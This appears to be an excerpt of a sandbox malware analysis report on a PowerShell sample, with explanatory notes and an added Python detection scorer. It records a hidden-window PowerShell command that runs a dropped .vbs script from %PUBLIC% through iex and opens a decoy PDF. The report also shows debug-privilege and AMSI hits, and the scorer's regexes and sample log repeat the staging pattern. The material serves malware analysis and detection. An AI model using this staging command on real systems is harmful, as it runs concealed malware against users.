      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5137
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4513
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6502
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3202
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216 | Thread sleep time: -10145709240540247s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120 | Thread sleep count: 6502 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108 | Thread sleep count: 3202 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156 | Thread sleep time: -6456360425798339s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 3036 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
      Note: 922337203685477 is Int64.MaxValue divided by 10000, i.e. [TimeSpan]::MaxValue expressed in milliseconds, so these entries record an unbounded wait rather than a chosen sleep interval. The PhysicalDrive0 open and the 30-second sleep are attributed to svchost.exe, a system process, not to the sample's PowerShell processes; the "Queries disk information" signature should be read with that in mind.
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000008.00000002.1353620639.0000021EF099B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: V# KoZIhvcNAQELBQAwTDEgMB4MSFT_NetEventVmNetworkAdatper.format.ps1xmlkdsb
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000005.00000002.1505487937.0000028A4E5FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
      Source: powershell.exe, 00000008.00000002.1353620639.0000021EF099B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FUy9M7dg+MZOuvCaKNyAMgkPE6MSFT_NetEventVmNetworkAdatper.cdxmlWEW
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 0000000C.00000002.2518239270.00000250DD041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2518330430.00000250DD053000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2516452433.00000250D7A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000005.00000002.1590508240.0000028A669C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Note: the NetEventVmNetworkAdapter and MSFT_NetEventVmNetworkAdatper strings are cmdlet and file names from the NetEventPacketCapture module manifest (the "Adatper" spelling is Microsoft's own file name), and "Hyper-V RAW" is the Winsock provider name that mswsock.dll registers; both appear in any PowerShell process that has enumerated installed modules and do not show the sample probing for a hypervisor. The STORAGE#Volume and SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00 device paths in the process 00000005 dump do reveal a VMware guest, but a string hit alone does not establish whether the sample enumerated those devices deliberately.
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 identical entries; SeDebugPrivilege enabled on the process token)

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: amsi64_7804.amsi.csv (AMSI scan buffers captured from PID 7804), type: OTHER
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7804, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
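      The two process-creation entries above (a hidden-window powershell.exe child evaluating a path under %PUBLIC%, and powershell.exe opening a PDF in Acrobat) are the parent/child and command-line pattern a detection engineer would hunt for in process-creation telemetry. What follows is an added example written for this page, not code from the Joe Sandbox report or from the sample: a Python scorer run over a constructed log of tab-separated parent image, image and command line records (the fields a Sysmon Event ID 1 or Security 4688 event carries). The indicator weights, the threshold, the script-host and viewer lists, and the benign records in the sample log are the editor's assumptions; only the two command lines recorded above are taken from the report.

```python
"""Score process-creation events for the staging pattern recorded in this report.

Added example for this page; not code from the Joe Sandbox report or the sample.
Input: tab-separated 'parent_image<TAB>image<TAB>command_line' records, one per
line, approximating Sysmon Event ID 1 / Security 4688 fields.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Assumed lists (editor's choice): script hosts whose command lines get scored,
# and document viewers that a script host should not normally be launching.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOC_VIEWERS = {"acrobat.exe", "acrord32.exe", "winword.exe", "excel.exe", "notepad.exe"}
DOC_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|rtf|txt)\b", re.I)

# (name, pattern, weight). Weights are assumptions, not values from the report.
CMDLINE_INDICATORS = [
    # -w hidden / -win hidden / -windowstyle hidden
    ("hidden_window", re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden\b", re.I), 3),
    # iex or Invoke-Expression as a standalone token (also matches the '=iex' seen above)
    ("invoke_expression", re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.I), 3),
    # a script file placed under %PUBLIC%, spelled either as the variable or via .NET
    ("public_dir_script", re.compile(
        r"""(?:%public%|GetEnvironmentVariable\(\s*['"]public['"]\s*\)).{0,40}?"""
        r"""\\{1,2}\w+\.(?:vbs|ps1|js|jse|bat|cmd|hta)\b""", re.I), 2),
    # -ExecutionPolicy / -ex / -ep set to Unrestricted or Bypass
    ("insecure_execpolicy", re.compile(r"-e(?:p|x(?:ecutionpolicy)?)\s+(?:unrestricted|bypass)\b", re.I), 2),
    # -noLogo is common in legitimate scripts, so it carries little weight on its own
    ("nologo", re.compile(r"-nologo\b", re.I), 1),
]
SUSPICIOUS_THRESHOLD = 3


@dataclass
class Event:
    parent_image: str
    image: str
    command_line: str

    @property
    def parent_name(self) -> str:
        return PureWindowsPath(self.parent_image).name.lower()

    @property
    def image_name(self) -> str:
        return PureWindowsPath(self.image).name.lower()


def parse_log(text: str) -> list[Event]:
    """Parse tab-separated records; malformed lines are skipped rather than guessed at."""
    events = []
    for line in text.splitlines():
        parts = line.split("\t", 2)
        if len(parts) == 3:
            events.append(Event(*parts))
    return events


def score_event(ev: Event) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one event."""
    score, hits = 0, []
    if ev.image_name in SCRIPT_HOSTS:
        for name, pattern, weight in CMDLINE_INDICATORS:
            if pattern.search(ev.command_line):
                score += weight
                hits.append(name)
    # Decoy pattern from the report: a script host launches a document viewer on a document.
    if ev.parent_name in SCRIPT_HOSTS and ev.image_name in DOC_VIEWERS and DOC_EXT.search(ev.command_line):
        score += 3
        hits.append("decoy_document")
    return score, hits


def triage(text: str) -> list[tuple[str, int, list[str]]]:
    """Events at or above the threshold, as (image name, score, indicator names)."""
    flagged = []
    for ev in parse_log(text):
        score, hits = score_event(ev)
        if score >= SUSPICIOUS_THRESHOLD:
            flagged.append((ev.image_name, score, hits))
    return flagged


# Constructed sample log. Records 2 and 3 reproduce the command lines the sandbox
# captured; records 1, 4 and 5 are invented (parent processes and paths assumed).
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = "\n".join("\t".join(r) for r in [
    ("C:\\Windows\\explorer.exe", PS,
     '"' + PS + '" -noLogo -ExecutionPolicy unrestricted -file "C:\\Users\\user\\Desktop\\invoice.ps1"'),
    (PS, PS,
     '"' + PS + '" -win hidden =iex "[Environment]::GetEnvironmentVariable(\'public\') + \'\\\\hqpoqw.vbs\'"'),
    (PS, "C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe",
     '"C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe" "C:\\Users\\user\\Desktop\\List of Required items and services.pdf"'),
    ("C:\\Windows\\explorer.exe", PS,
     'powershell.exe -NoLogo -Command "Get-Service | Where-Object Status -eq Running"'),
    ("C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\svchost.exe",
     "C:\\Windows\\System32\\svchost.exe -k netsvcs"),
])

if __name__ == "__main__":
    for image, score, hits in triage(SAMPLE_LOG):
        print(f"{image:16} score={score} {hits}")
```

      Running triage over the sample log flags three records: the unrestricted-policy launch (score 3), the hidden-window child with iex and the %PUBLIC% script (score 8), and Acrobat opened on the decoy document (score 3). The plain -NoLogo administrative command and svchost.exe stay below the threshold. The regexes are deliberately narrow to the spellings seen in this report; a production rule would also need to cover -EncodedCommand and the other PowerShell parameter abbreviations.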
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 identical entries)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 identical entries)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 identical entries)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 identical entries)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 identical entries)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (3 identical entries)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Note: apart from C:\ itself, every queried path is a CatRoot signing catalog or a GAC assembly touched while PowerShell loaded the AppV, SecureStartup/BitLocker and KeyDistributionService modules (the "Loading BitLocker PowerShell Module" signature). Volume queries on those files accompany module loading and catalog signature checks; they are not by themselves evidence that the sample fingerprinted the volume, though the repeated C:\ queries remain worth noting alongside the other sandbox-awareness signals above.
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
